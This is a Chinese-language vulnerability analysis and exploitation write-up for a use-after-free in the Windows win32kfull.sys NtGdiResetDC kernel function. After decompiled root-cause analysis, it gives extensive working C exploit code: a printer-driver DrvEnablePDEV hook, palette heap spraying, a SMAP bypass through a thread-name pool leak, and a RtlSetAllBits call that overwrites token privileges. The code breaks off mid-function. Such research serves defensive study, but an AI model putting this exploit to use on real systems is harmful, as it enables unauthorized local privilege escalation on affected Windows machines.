前言
该漏洞本身原理比较简单,而作为 Win10下的利用才是本篇文章的研究重点。
1.漏洞简介
1.1.漏洞描述
win32kfull.sys中的 NtGdiResetDC\textcolor{cornflowerblue}{NtGdiResetDC}NtGdiResetDC函数存在 UAF漏洞,攻击者可以利用该漏洞进行本地权限提升。
1.2.影响版本
windows_10
windows_10 20h2
windows_10 21h1
windows_10 1607
windows_10 1809
windows_10 1909
windows_10 2004
windows_11
windows_7 - sp1
windows_8.1
windows_rt_8.1
windows_server 20h2
windows_server 2004
windows_server_2008 - sp2
windows_server_2008 r2
windows_server_2012
windows_server_2012 r2
windows_server_2016
windows_server_2019
windows_server_2022
1.3.危害等级
7.8 | 高危
2.漏洞分析
2.1.漏洞起因
用户层通过调用函数ResetDC\textcolor{cornflowerblue}{ResetDC}ResetDC,进入到内核层NtGdiResetDC\textcolor{cornflowerblue}{NtGdiResetDC}NtGdiResetDC -> GreResetDCInternal\textcolor{cornflowerblue}{GreResetDCInternal}GreResetDCInternal,主要漏洞点:
__int64 __usercall GreResetDCInternal@<rax>(HDC hdc@<rcx>, __int64 pdmw@<rdx>, int *a3@<r8>)
{
...
hdc_1 = hdc;
DCOBJ::DCOBJ((DCOBJ *)&dcobj, hdc);
dcobj_1 = dcobj;
...
pdevob = *(_QWORD *)(dcobj_1 + 0x30); // 从旧的DC对象中获取dev
if ( *(_DWORD *)(pdevob + 0x20) == 1 )
{
// 创建新的DC
hdcNew = (HDC)hdcOpenDCW(&qword_1C0141EB0, pdmw_1, 0i64, 0i64, *(_QWORD *)(pdevob + 0xA18));
hdcNew_1 = hdcNew;
if ( hdcNew )
{
*(_QWORD *)(pdevob + 0xA18) = 0i64;
DCOBJ::DCOBJ((DCOBJ *)&dco, hdcNew);
v14 = (_QWORD *)dco;
if ( dco )
{
if ( v12 )
*(_DWORD *)(dco + 0x78) = *(_DWORD *)(dco + 0x74);
v14[308] = *(_QWORD *)(dcobj + 0x9A0);
*(_QWORD *)(dcobj + 0x9A0) = 0i64;
v14[309] = *(_QWORD *)(dcobj + 0x9A8);
*(_QWORD *)(dcobj + 0x9A8) = 0i64;
v15 = *(void (__fastcall **)(_QWORD, _QWORD))(pdevob + 0xAD0);// 函数是 UMPDDrvResetPDEV
if ( v15 )
v15(*(_QWORD *)(pdevob + 0x720), *(_QWORD *)(v14[6] + 0x720i64));// 函数调用
GreAcquireHmgrSemaphore();
LOBYTE(v23) = 1;
HmgSwapLockedHandleContents(hdc_1, 0i64, hdcNew_1, 0i64, v23);// 交换新旧DC句柄内容
GreReleaseHmgrSemaphore();
v7 = 1;
}
else
{
EngSetLastError((unsigned int)(dco + 6));
}
XDCOBJ::vUnlockNoNullSet((XDCOBJ *)&dco);
}
}
...
LABEL_21:
XDCOBJ::vUnlockNoNullSet((XDCOBJ *)&dcobj);// 解锁旧的 dc对象
if ( v7 )
{
bDeleteDCInternal(hdcNew_1, 1i64, 0i64); // 由于之前已经交换了句柄,所以这里释放的是旧的DC
DCOBJ::DCOBJ((DCOBJ *)&dcobj, hdc_1);
v16 = dcobj;
if ( !dcobj )
{
EngSetLastError((unsigned int)(dcobj + 6));
LABEL_24:
v7 = 0;
LABEL_38:
XDCOBJ::vUnlockNoNullSet((XDCOBJ *)&dcobj);// 解锁新的 DC对象
return v7;
}
...
}
...
}
-
line:11 hdcOpenDCW\textcolor{cornflowerblue}{hdcOpenDCW}hdcOpenDCW函数内部会调用一个位于用户层的回调DrvEnablePDEV\textcolor{cornflowerblue}{DrvEnablePDEV}DrvEnablePDEV,具体调用链:
- hdcOpenDCW\textcolor{cornflowerblue}{hdcOpenDCW }hdcOpenDCW-> PDEVOBJ::PDEVOBJ\textcolor{cornflowerblue}{PDEVOBJ::PDEVOBJ}PDEVOBJ::PDEVOBJ -> PDEVOBJ::EnablePDEV\textcolor{cornflowerblue}{PDEVOBJ::EnablePDEV}PDEVOBJ::EnablePDEV -> DrvEnablePDEV\textcolor{cornflowerblue}{DrvEnablePDEV}DrvEnablePDEV
-
line:25 从旧的 dev对象中获取函数指针,正常情况下该指针指向的是UMPDDrvResetPDEV\textcolor{cornflowerblue}{UMPDDrvResetPDEV}UMPDDrvResetPDEV,应该是重置 DEV设备对象。
-
line:45 从这里开始将释放旧的 DC
从以上分析中可以看出一个问题,因为函数hdcOpenDCW\textcolor{cornflowerblue}{hdcOpenDCW}hdcOpenDCW会调用用户层的一个回调函数,所以 DC对象可能易受破坏。函数GreResetDCInternal\textcolor{cornflowerblue}{GreResetDCInternal}GreResetDCInternal后面会解锁并释放旧的 DC对象。于是,攻击者可以通过 HOOK用户层中相应的回调函数,再次调用ResetDC\textcolor{cornflowerblue}{ResetDC}ResetDC同一个 DC句柄,这就使得内核重新调用函数GreResetDCInternal\textcolor{cornflowerblue}{GreResetDCInternal}GreResetDCInternal,但由于旧的 DC对象已经被释放,而 line:25仍是从旧的 dev对象中获取函数指针,并在 line:29 尝试调用,所以这是一个典型的 UAF漏洞。
3.漏洞利用
3.1.利用流程
总体利用流程如上图所示。首先在应用层 HOOK函数DrvEnablePDEV\textcolor{cornflowerblue}{DrvEnablePDEV}DrvEnablePDEV,然后创建一个全局打印机的 DC句柄 hdc,然后ResetDC(hdc)\textcolor{orange}{ResetDC(hdc)}ResetDC(hdc),使内核执行函数GreResetDCInternal\textcolor{cornflowerblue}{GreResetDCInternal}GreResetDCInternal,并在其回调的过程中再次ResetDC(hdc)\textcolor{orange}{ResetDC(hdc)}ResetDC(hdc),使得内核释放打印机的DC对象。利用 Palettes占位被释放掉的 DC对象中 DEV对象的内存,并伪造 DEV的UMPDDrvResetPDEV\textcolor{cornflowerblue}{UMPDDrvResetPDEV}UMPDDrvResetPDEV函数指针和参数,最终获得一个有限的(只限于接受一个参数,因为另一个参数不可控)任意内核函数调用的原语。 POC使用任意内核函数调用原语调用函数RtlSetAllBits\textcolor{cornflowerblue}{RtlSetAllBits}RtlSetAllBits修改 Token的权限实现提权。
下面将对利用流程中的重点进行分析\textcolor{green}{下面将对利用流程中的重点进行分析}下面将对利用流程中的重点进行分析
3.2.堆喷
3.2.1.利用调色板堆喷的前置知识
系统调色板(Palette)在堆喷中是比较常用到的,用户层调用函数CreatePalette\textcolor{cornflowerblue}{CreatePalette}CreatePalette对应的内核服务:
signed __int64 __fastcall NtGdiCreatePaletteInternal(char *a1, unsigned int palNumEntries){
...
if ( *(_WORD *)a1 != 0x300 || !palNumEntries ) // palNumEntries 来自应用层
// CreatePalette(LOGPALETTE* lPalette)的
// lPalette->palNumEntries
// 校验lPalette->palVersion 和 lPalette->palNumEntries;
v2 = 0i64;
if ( v2 )
{
...
PALMEMOBJ::bCreatePalette(&v5, 1i64, size);
...
}
...
}
//////////////////////////////////////////////////////////////////////////////////////
__int64 __fastcall PALMEMOBJ::bCreatePalette(PALMEMOBJ *this, int a2, unsigned int size, unsigned int *a4, unsigned int a5, unsigned int a6, unsigned int a7, unsigned int a8)
{
...
if ( a2 == 1 )
{
size = 4 * palNumEntries + 0x90; // 调色板对象实际要分配的大小计算方式,
v12 = a8 & 0x102F00;
if ( !palNumEntries )
return 0i64;
goto LABEL_11;
}
...
LABEL_11:
obj = AllocateObject(size, 8, 0); // 分配一个size大小的对象,属于LookasideList管理的分页池的内存
v14 = (struct _BASEOBJECT *)obj;
*(_QWORD *)v10 = obj;
if ( obj )
{
...
ColorTabl = *(unsigned int **)(*(_QWORD *)v10 + 0x78i64);
color = v26; // data来自lPalette->palPalEntry
if ( v26 )
{
for ( i = 0; i < palNumEntries_1; ++i ) // 向调色板的色彩板中填充颜色
{
v23 = *color;
++color;
*ColorTabl = v23;
++ColorTabl;
}
}
...
}
可见调色板的大小和色彩都是可控的,因此可以用来进行堆喷的同时控制内存的数据。但要注意调色板所在内存的类型 @line:31,不是同类型的内存无法使用这种方式去堆喷。
一般用法:
void SprayPalettes(DWORD size){
WORD palNumEntries = (size-0x90)/4;
DWORD palSize = sizeof(LOGPALETTE) + (palNumEntries-1)*sizeof(PALETTEENTRY);
LOGPALETTE* lPalette = (LOGPALETTE*)GlobalAlloc(GMEM_ZEROINIT, palSize);
PBYTE Color = (PBYTE)Palette+4;
/*根据你的需要设置Color的内存*/
lPalette->palNumEntries=palNumEntries;
lPalette->palVersion=0x300;
// 根据实际情况可进行若干次如下的操作
CreatePalette(lPalette);
}
3.2.2.利用调色板占位DC对象内存
首先查看 DEV对象所占的内存大小
所占内存大小是 0xE30(sizeof(DEVOBJ)+sizeof(POOL_HEADER)\textcolor{orange}{sizeof(DEVOBJ)+sizeof(POOL\_HEADER)}sizeof(DEVOBJ)+sizeof(POOL_HEADER))。
调用SprayPalettes(0xE20)\textcolor{orange}{SprayPalettes(0xE20)}SprayPalettes(0xE20)进行堆喷。
void SprayPalettes(DWORD size) {
DWORD palCount = (size - 0x90) / 4;
DWORD palSize = sizeof(LOGPALETTE) + (palCount - 1) * sizeof(PALETTEENTRY);
LOGPALETTE* lPalette = (LOGPALETTE*)GlobalAlloc(GMEM_ZEROINIT, palSize);
if (lPalette == NULL) {
printf("[Error_%d] SprayPalettes(): Insufficient system resource.\n", __LINE__);
return;
}
// lPalette->PaletteEntry
PCHAR Fake = (PCHAR)lPalette+4;
// Fake BitmapHeader,不同版本系统需要根据调试做出微调
ULONG64 BitmapHeader = FakeBitmapHeader() - 1 + 0x10;
printf("[+] FakeBitmapHeader = %p\n", BitmapHeader);
/*
1607:
*(pdc+0x720) = BitmapHeader
*(pdc+0xAD0) = RtlSetAllBits
*/
((PULONG64)Fake)[0xD7] = BitmapHeader;
((PULONG64)Fake)[0x14D] = g::RtlSetAllBitsAddress;
lPalette->palNumEntries = (WORD)palCount;
lPalette->palVersion = 0x300;
for(int i=0;i<0x1000;i++)
CreatePalette(lPalette);
}
3.3.使用函数RtlSetAllBits修改Token的权限
3.3.1.RtlSetAllBits分析
NTSYSAPI VOID RtlSetAllBits(
[in] PRTL_BITMAP BitMapHeader // 指向描述位图的 RTL_BITMAP 结构的指针。 此结构必须已由 RtlInitializeBitMap 例程初始化。
);
函数要求一个 PRTL_BITMAP
结构的参数,该函数内部实现:
void __stdcall RtlSetAllBits(PRTL_BITMAP BitMapHeader)
{
unsigned int *v1; // r8
unsigned __int64 size; // r9
v1 = BitMapHeader->Buffer;
// size相当于是BitMapHeader->SizeOfBitMap 以2为底的对数减1,向下取整的结果
size = (unsigned __int64)(4 * (((BitMapHeader->SizeOfBitMap & 0x1F) != 0) + (BitMapHeader->SizeOfBitMap >> 5))) >> 2;
if ( size )
{
if ( (unsigned __int8)v1 & 4 )
{
*v1 = -1;
if ( !--size )
return;
++v1;
}
memset(v1, 0xFFu, 8 * (size >> 1));
if ( size & 1 )
v1[size - 1] = -1;
}
}
瞧,这个函数是多么令人感到惊喜,因为它会将目标内存写入8∗(size/2)\textcolor{orange}{8*(size/2)}8∗(size/2)个 0xFF,这要是目标内存为Token−>Privilege\textcolor{orange}{Token->Privilege}Token−>Privilege,足以使对应的进程获得所有权限!
3.3.2.绕过SMAP伪造PRTL_BITMAP
在 Win8及其之后的系统开启了 SMAP,意味着内核无法直接访问用户态空间下的数据,所以不能直接用位于用户空间的PRTL_BITMAP
作为RtlSetAllBits\textcolor{cornflowerblue}{RtlSetAllBits}RtlSetAllBits的参数。
前辈给出了一种新的方式——利用函数NtSetInformationThread\textcolor{cornflowerblue}{NtSetInformationThread}NtSetInformationThread为一个线程设置名字,该线程的名字会被保存在内核池中,我们将线程名构造成PRTL_BITMAP
,自然也就位于内核池中。通过函数ZwQuerySystemInformation\textcolor{cornflowerblue}{ZwQuerySystemInformation}ZwQuerySystemInformation泄露内核池地址,我们将得到PRTL_BITMAP
的具体位置,这样就绕过了 SMAP。
static DWORD WINAPI LeakDemoThread(LPVOID lParam) {
while (TRUE) {
Sleep(0x1000 * 60 * 60 * 24 * 365);
}
return 0;
}
ULONG64 FakeBitmapHeader() {
HANDLE hThread = INVALID_HANDLE_VALUE;
DWORD dwThreadID;
DWORD dwSize = 0x1000;
PVOID payload = NULL;
// 创建一个线程并立即挂起
hThread = CreateThread(NULL, 0, LeakDemoThread, NULL, CREATE_SUSPENDED, &dwThreadID);
if (hThread == INVALID_HANDLE_VALUE) {
printf("[Error_%d] CreateThread failed.\n", __LINE__);
exit(0);
}
payload = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
// BitmapHeader->Size
*(PULONG64)payload = 0x40;
// BitmapHeader->Buffer
*(PULONG64)((ULONG64)payload + 8) = GetToken()+0x48;
UNICODE_STRING uzString;
uzString.Buffer = (PWCHAR)payload;
uzString.Length = dwSize;
uzString.MaximumLength = 0xffff;
// 将伪造的BitMapHeader结构设置到线程名中,使其位于内核池中,以绕过SMAP保护
NTSTATUS ntst = g::NtSetInformationThread(hThread, (THREADINFOCLASS)ThreadNameInformation, &uzString, sizeof(uzString));
if (ntst != 0) {
printf("[Error_%d] NtSetInformationThread failed.n", __LINE__);
exit(0);
}
// 泄露线程名的地址
dwSize = 0x400*0x400;
DWORD dwRetSize;
PSYSTEM_BIGPOOL_INFORMATION SysPoolInfo =
(PSYSTEM_BIGPOOL_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, dwSize);
ntst = g::ZwQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemBigPoolInformation, SysPoolInfo, dwSize, &dwRetSize);
if (ntst != 0) {
printf("[Error_%d] ZwQuerySystemInformation failed.\n", __LINE__);
exit(0);
}
DWORD DesireSize = uzString.Length + sizeof(uzString);
for (DWORD i = 0; i < SysPoolInfo->Count; i++) {
if (!strncmp((char*)SysPoolInfo->AllocatedInfo[i].Tag, "ThNm", 4) &&
SysPoolInfo->AllocatedInfo[i].SizeInBytes == DesireSize)
{
return (ULONG64)SysPoolInfo->AllocatedInfo[i].VirtualAddress;
}
}
return 0;
}
4.复现
4.1.POC
#include<windows.h>
#include<winddi.h>
#include<winspool.h>
#include <winternl.h>
#include <stdio.h>
#include <Psapi.h>
#pragma comment(lib, "Psapi.lib ")
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define ThreadNameInformation 0x26
#define SystemExtendedHandleInformation 64
#define SystemBigPoolInformation 66
using ZwQuerySystemInformation_t = NTSTATUS(*)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
using NtSetInformationThread_t = NTSTATUS(*)(
HANDLE threadHandle,
THREADINFOCLASS threadInformationClass,
PVOID threadInformation,
ULONG threadInformationLength);
using DrvEnableDriver_t = BOOL(*)(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded);
using DrvEnablePDEV_t = DHPDEV(*)(DEVMODEW* pdm,
LPWSTR pwszLogAddress,
ULONG cPat,
HSURF* phsurfPatterns,
ULONG cjCaps,
ULONG* pdevcaps,
ULONG cjDevInfo,
DEVINFO* pdi,
HDEV hdev,
LPWSTR pwszDeviceName,
HANDLE hDriver);
using DrvEnablePDEV_t = DHPDEV(*)(DEVMODEW* pdm,
LPWSTR pwszLogAddress,
ULONG cPat,
HSURF* phsurfPatterns,
ULONG cjCaps,
ULONG* pdevcaps,
ULONG cjDevInfo,
DEVINFO* pdi,
HDEV hdev,
LPWSTR pwszDeviceName,
HANDLE hDriver);
using DrvDisableDriver_t = void(*)();
typedef struct _SYSTEM_BIGPOOL_ENTRY
{
union
{
PVOID VirtualAddress;
ULONG_PTR NonPaged : 1; // Set to 1 if entry is nonpaged.
};
SIZE_T SizeInBytes;
union
{
UCHAR Tag[4];
ULONG TagUlong;
};
} SYSTEM_BIGPOOL_ENTRY, * PSYSTEM_BIGPOOL_ENTRY;
typedef struct _SYSTEM_BIGPOOL_INFORMATION
{
ULONG Count;
SYSTEM_BIGPOOL_ENTRY AllocatedInfo[1];
} SYSTEM_BIGPOOL_INFORMATION, * PSYSTEM_BIGPOOL_INFORMATION;
typedef struct _SYSTEM_HANDLE
{
PVOID Object;
HANDLE UniqueProcessId;
HANDLE HandleValue;
ULONG GrantedAccess;
USHORT CreatorBackTraceIndex;
USHORT ObjectTypeIndex;
ULONG HandleAttributes;
ULONG Reserved;
} SYSTEM_HANDLE, * PSYSTEM_HANDLE;
typedef struct _SYSTEM_HANDLE_INFORMATION_EX
{
ULONG_PTR HandleCount;
ULONG_PTR Reserved;
SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;
namespace g {
DrvEnablePDEV_t OldDrvEnablePDEV = 0;
DrvEnableDriver_t DrvEnableDriver = 0;
DrvDisableDriver_t DrvDisableDriver = 0;
ZwQuerySystemInformation_t ZwQuerySystemInformation = 0;
NtSetInformationThread_t NtSetInformationThread = 0;
ULONG64 RtlSetAllBitsAddress = 0;
PCHAR szKernelName = NULL;
PCHAR szPrinterName = NULL;
HANDLE hToken=INVALID_HANDLE_VALUE;
ULONG64 KernelBase = 0;
bool bIsTrigger = false;
HDC hdc = 0;
};
void Hook_DrvEnablePDEV();
ULONG64 GetKernelBase();
bool Init();
ULONG64 GetToken();
DHPDEV DrvEnablePDEV_Proxy(
DEVMODEW* pdm,
LPWSTR pwszLogAddress,
ULONG cPat,
HSURF* phsurfPatterns,
ULONG cjCaps,
ULONG* pdevcaps,
ULONG cjDevInfo,
DEVINFO* pdi,
HDEV hdev,
LPWSTR pwszDeviceName,
HANDLE hDriver);
void Hook_DrvEnablePDEV();
static DWORD WINAPI LeakDemoThread(LPVOID lParam);
ULONG64 FakeBitmapHeader();
void SprayPalettes(DWORD size);
bool CheckPrivilege(HANDLE TokenHandle);
DWORD getProcessId(const char* name);
void SpawnShell();
ULONG64 GetKernelBase() {
DWORD cReturn=0;
char szDevName[MAX_PATH] = { 0 };
ULONG64 KernelBase = 0;
EnumDeviceDrivers(NULL, 0, &cReturn);
if (cReturn <= 0) {
printf("[Error_%d] GetKernelBase(): EnumDeviceDrivers failed.\n", __LINE__);
exit(-1);
}
PULONG64 DevList = (PULONG64)GlobalAlloc(GMEM_ZEROINIT, cReturn);
if (DevList == NULL) {
printf("[Error_%d] GetKernelBase(): Insufficient system resource.\n", __LINE__);
exit(-1);
}
if (!EnumDeviceDrivers((LPVOID*)DevList, cReturn, &cReturn)) {
printf("[Error_%d] GetKernelBase(): EnumDeviceDrivers failed.\n", __LINE__);
exit(-1);
}
for (DWORD i = 0; i < cReturn / sizeof(DevList[0]); i++)
{
if (GetDeviceDriverBaseNameA((LPVOID)DevList[i], szDevName, MAX_PATH)) {
char* LowerName = _strlwr(szDevName);
if (!strncmp(LowerName, "nt",2)) {
KernelBase = DevList[i];
g::szKernelName = strdup(szDevName);
break;
}
}
}
free(DevList);
return KernelBase;
}
bool Init() {
HMODULE hNt = LoadLibraryA("ntdll");
if (hNt == NULL) {
printf("[Error_%d] Init(): Can't find ntdll.",__LINE__);
return FALSE;
}
g::ZwQuerySystemInformation = (ZwQuerySystemInformation_t)GetProcAddress(hNt, "NtQuerySystemInformation");
g::NtSetInformationThread = (NtSetInformationThread_t)GetProcAddress(hNt, "NtSetInformationThread");
if (g::NtSetInformationThread == NULL || g::ZwQuerySystemInformation == NULL) {
printf("[Error_%d] Init(): Can't find target func.\n", __LINE__);
return FALSE;
}
g::KernelBase = GetKernelBase();
HMODULE hKernel = LoadLibraryA(g::szKernelName);
if (hKernel == NULL) {
printf("[Error_%d] Init(): Can't find %s.", __LINE__, g::szKernelName);
return FALSE;
}
ULONG64 RtlSetAllBitsProc = (ULONG64)GetProcAddress(hKernel, "RtlSetAllBits");
if (RtlSetAllBitsProc==0) {
printf("[Error_%d] Init(): Can't find target func.\n", __LINE__);
return FALSE;
}
g::RtlSetAllBitsAddress = RtlSetAllBitsProc - (ULONG64)hKernel + g::KernelBase;
printf("[+] Found RtlSetAllBitsAddress = %p\n", g::RtlSetAllBitsAddress);
return TRUE;
}
ULONG64 GetToken() {
PSYSTEM_HANDLE_INFORMATION_EX sys_handle_info_ref = NULL;
ULONG64 Token = 0;
ULONG len = 20;
NTSTATUS ntst = 0;
OpenProcessToken(GetCurrentProcess(), GENERIC_READ, &g::hToken);
if (g::hToken == INVALID_HANDLE_VALUE) {
printf("[Error_%d] GetToken(): OpenProcessToken failed.\n", __LINE__);
return 0;
}
//获取本进程的EPROCESS
do {
len *= 2;
sys_handle_info_ref = (PSYSTEM_HANDLE_INFORMATION_EX)realloc(sys_handle_info_ref, len);
ntst = g::ZwQuerySystemInformation(
(SYSTEM_INFORMATION_CLASS)SystemExtendedHandleInformation, sys_handle_info_ref, len, &len);
} while (ntst == STATUS_INFO_LENGTH_MISMATCH);
if (ntst != 0) {
printf("[Error_%d] GetToken(): ZwQuerySystemInformation failed.\n", __LINE__);
if (sys_handle_info_ref)
free(sys_handle_info_ref);
return 0;
}
DWORD pid = GetCurrentProcessId();
for (int i = 0; i < sys_handle_info_ref->HandleCount; i++) {
if (g::hToken == sys_handle_info_ref->Handles[i].HandleValue
&& (HANDLE)pid == sys_handle_info_ref->Handles[i].UniqueProcessId) {
Token = (ULONG64)sys_handle_info_ref->Handles[i].Object;
break;
}
}
if (sys_handle_info_ref)
free(sys_handle_info_ref);
printf("[+] Found current process token = %p\n",Token);
return Token;
}
DHPDEV DrvEnablePDEV_Proxy(
DEVMODEW* pdm,
LPWSTR pwszLogAddress,
ULONG cPat,
HSURF* phsurfPatterns,
ULONG cjCaps,
ULONG* pdevcaps,
ULONG cjDevInfo,
DEVINFO* pdi,
HDEV hdev,
LPWSTR pwszDeviceName,
HANDLE hDriver) {
DHPDEV res;
printf("[+] DrvEnablePDEV_Proxy called.\n");
res = g::OldDrvEnablePDEV(pdm, pwszLogAddress, cPat, phsurfPatterns, cjCaps, pdevcaps, cjDevInfo, pdi, hdev, pwszDeviceName, hDriver);
if (g::bIsTrigger) {
// 释放hdc
g::bIsTrigger = FALSE;
ResetDC(g::hdc, NULL);
// UAF
SprayPalettes(0xE20);
}
return res;
}
void Hook_DrvEnablePDEV() {
DWORD cbBuf = 0;
DWORD cbNeed,cReturned;
PPRINTER_INFO_4 PrintInfo=NULL;
DRVENABLEDATA DrvData;
DWORD OldProtect;
HANDLE hPrinter = INVALID_HANDLE_VALUE;
//首先枚举本地安装的打印机,找到可用的
EnumPrintersA(PRINTER_ENUM_LOCAL, NULL, 4, NULL, 0, &cbNeed, &cReturned);
if (cbNeed <= 0) {
printf("[Error_%d] Hook_DrvEnablePDEV(): Can't find available printer.\n", __LINE__);
exit(-1);
}
PrintInfo = (PPRINTER_INFO_4)GlobalAlloc(GMEM_ZEROINIT, cbNeed);
if (PrintInfo == NULL) {
printf("[Error_%d] Hook_DrvEnablePDEV(): Insufficient system resource.\n", __LINE__);
exit(-1);
}
if (!EnumPrintersA(PRINTER_ENUM_LOCAL, NULL, 4, (PBYTE)PrintInfo, cbNeed, &cbNeed, &cReturned)
|| cReturned<=0) {
printf("[Error_%d] Hook_DrvEnablePDEV(): Can't find available printer.\n", __LINE__);
exit(-1);
}
// 循环查找打印机
for (DWORD i = 0; i < cReturned; i++) {
if (!OpenPrinterA(PrintInfo[i].pPrinterName, &hPrinter, NULL)) {
printf("[Error_%d] Hook_DrvEnablePDEV(): OpenPrinterA failed.\n", __LINE__);
continue;
}
else {
printf("[+] Using a available printer: %s.\n", PrintInfo[i].pPrinterName);
g::szPrinterName = strdup(PrintInfo[i].pPrinterName);
// 获取打印机驱动文件名
GetPrinterDriverA(hPrinter, NULL, 2, NULL, NULL, &cReturned);
if (cReturned <= 0) {
printf("[Error_%d] Hook_DrvEnablePDEV(): GetPrinterDriverA failed.\n", __LINE__);
continue;
}
PDRIVER_INFO_2 DrvInfo = (PDRIVER_INFO_2)GlobalAlloc(GMEM_ZEROINIT, cReturned);
if (DrvInfo == NULL) {
printf("[Error_%d] Hook_DrvEnablePDEV(): Insufficient system resource.\n", __LINE__);
continue;
}
if (!GetPrinterDriverA(hPrinter, NULL, 2, (PBYTE)DrvInfo, cReturned, &cReturned) ||
cReturned <= 0) {
printf("[Error_%d] Hook_DrvEnablePDEV(): GetPrinterDriverA failed.\n", __LINE__);
continue;
}
HMODULE hPrinterDrv = LoadLibraryExA(DrvInfo->pDriverPath, NULL, LOAD_WITH_ALTERED_SEARCH_PATH);
if (hPrinterDrv == NULL) {
printf("[Error_%d] Hook_DrvEnablePDEV(): LoadLibraryExA failed.\n", __LINE__);
continue;
}
g::DrvEnableDriver = (DrvEnableDriver_t)GetProcAddress(hPrinterDrv, "DrvEnableDriver");
g::DrvDisableDriver = (DrvDisableDriver_t)GetProcAddress(hPrinterDrv, "DrvDisableDriver");
if (g::DrvEnableDriver == NULL || g::DrvDisableDriver == NULL) {
printf("[Error_%d] Hook_DrvEnablePDEV(): Can't find target functions .\n", __LINE__);
continue;
}
// 打开图形驱动,获取回调函数列表,里面有我们要HOOK的函数
if (!g::DrvEnableDriver(DDI_DRIVER_VERSION_NT4, sizeof(DRVENABLEDATA), &DrvData)) {
printf("[Error_%d] Hook_DrvEnablePDEV(): DrvEnableDriver failed.\n", __LINE__);
continue;
}
if (!VirtualProtect(DrvData.pdrvfn, DrvData.c * sizeof(PFN), PAGE_READWRITE, &OldProtect))
{
printf("[Error_%d] Hook_DrvEnablePDEV(): VirtualProtect failed.\n", __LINE__);
continue;
}
for (DWORD i = 0; i < DrvData.c; i++) {
if (DrvData.pdrvfn[i].iFunc == INDEX_DrvEnablePDEV) {
// 保存并HOOK
g::OldDrvEnablePDEV = (DrvEnablePDEV_t)DrvData.pdrvfn[i].pfn;
DrvData.pdrvfn[i].pfn = (PFN)DrvEnablePDEV_Proxy;
break;
}
}
}
// 关闭图形驱动
g::DrvDisableDriver();
VirtualProtect(DrvData.pdrvfn, DrvData.c * sizeof(PFN), OldProtect, &OldProtect);
return;
}
}
static DWORD WINAPI LeakDemoThread(LPVOID lParam) {
while (TRUE) {
Sleep(0x1000 * 60 * 60 * 24 * 365);
}
return 0;
}
ULONG64 FakeBitmapHeader() {
HANDLE hThread = INVALID_HANDLE_VALUE;
DWORD dwThreadID;
DWORD dwSize = 0x1000;
PVOID payload = NULL;
hThread = CreateThread(NULL, 0, LeakDemoThread, NULL, CREATE_SUSPENDED, &dwThreadID);
if (hThread == INVALID_HANDLE_VALUE) {
printf("[Error_%d] CreateThread failed.\n", __LINE__);
exit(0);
}
payload = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
// BitmapHeader->Size
*(PULONG64)payload = 0x40;
// BitmapHeader->Buffer
*(PULONG64)((ULONG64)payload + 8) = GetToken()+0x48;
UNICODE_STRING uzString;
uzString.Buffer = (PWCHAR)payload;
uzString.Length = dwSize;
uzString.MaximumLength = 0xffff;
// 将伪造的BitMapHeader结构设置到线程名中,使其位于内核池中,以绕过SMAP保护
NTSTATUS ntst = g::NtSetInformationThread(hThread, (THREADINFOCLASS)ThreadNameInformation, &uzString, sizeof(uzString));
if (ntst != 0) {
printf("[Error_%d] NtSetInformationThread failed.\n", __LINE__);
exit(0);
}
// 泄露线程名的地址
dwSize = 0x400*0x400;
DWORD dwRetSize;
PSYSTEM_BIGPOOL_INFORMATION SysPoolInfo =
(PSYSTEM_BIGPOOL_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, dwSize);
ntst = g::ZwQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemBigPoolInformation, SysPoolInfo, dwSize, &dwRetSize);
if (ntst != 0) {
printf("[Error_%d] ZwQuerySystemInformation failed.\n", __LINE__);
exit(0);
}
DWORD DesireSize = uzString.Length + sizeof(uzString);
for (DWORD i = 0; i < SysPoolInfo->Count; i++) {
if (!strncmp((char*)SysPoolInfo->AllocatedInfo[i].Tag, "ThNm", 4) &&
SysPoolInfo->AllocatedInfo[i].SizeInBytes == DesireSize)
{
return (ULONG64)SysPoolInfo->AllocatedInfo[i].VirtualAddress;
}
}
return 0;
}
void SprayPalettes(DWORD size) {
DWORD palCount = (size - 0x90) / 4;
DWORD palSize = sizeof(LOGPALETTE) + (palCount - 1) * sizeof(PALETTEENTRY);
LOGPALETTE* lPalette = (LOGPALETTE*)GlobalAlloc(GMEM_ZEROINIT, palSize);
if (lPalette == NULL) {
printf("[Error_%d] SprayPalettes(): Insufficient system resource.\n", __LINE__);
return;
}
// lPalette->PaletteEntry
PCHAR Fake = (PCHAR)lPalette+4;
// Fake BitmapHeader
ULONG64 BitmapHeader = FakeBitmapHeader() - 1 + 0x10;
printf("[+] FakeBitmapHeader = %p\n", BitmapHeader);
/*
1607:
*(pdc+0x720) = BitmapHeader
*(pdc+0xAD0) = RtlSetAllBits
*/
((PULONG64)Fake)[0xD7] = BitmapHeader;
((PULONG64)Fake)[0x14D] = g::RtlSetAllBitsAddress;
lPalette->palNumEntries = (WORD)palCount;
lPalette->palVersion = 0x300;
for(int i=0;i<0x1000;i++)
CreatePalette(lPalette);
}
bool CheckPrivilege(HANDLE TokenHandle)
{
BOOL isPrivilegeSet = FALSE;
PRIVILEGE_SET privSet;
LUID_AND_ATTRIBUTES Privileges[1];
LookupPrivilegeValue(NULL, "SeDebugPrivilege", &(Privileges[0].Luid));
Privileges[0].Attributes = 0;
privSet.PrivilegeCount = 1;
privSet.Control = PRIVILEGE_SET_ALL_NECESSARY;
memcpy(privSet.Privilege, Privileges, sizeof(Privileges));
PrivilegeCheck(TokenHandle, &privSet, &isPrivilegeSet);
return isPrivilegeSet;
}
DWORD getProcessId(const char* name)
{
DWORD aProcesses[1024], cbNeeded, cProcesses;
unsigned int i;
if (!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded))
{
printf("[Error_%d] EnumProcess failed...\n",__LINE__);
exit(0);
}
// Calculate how many process identifiers were returned.
cProcesses = cbNeeded / sizeof(DWORD);
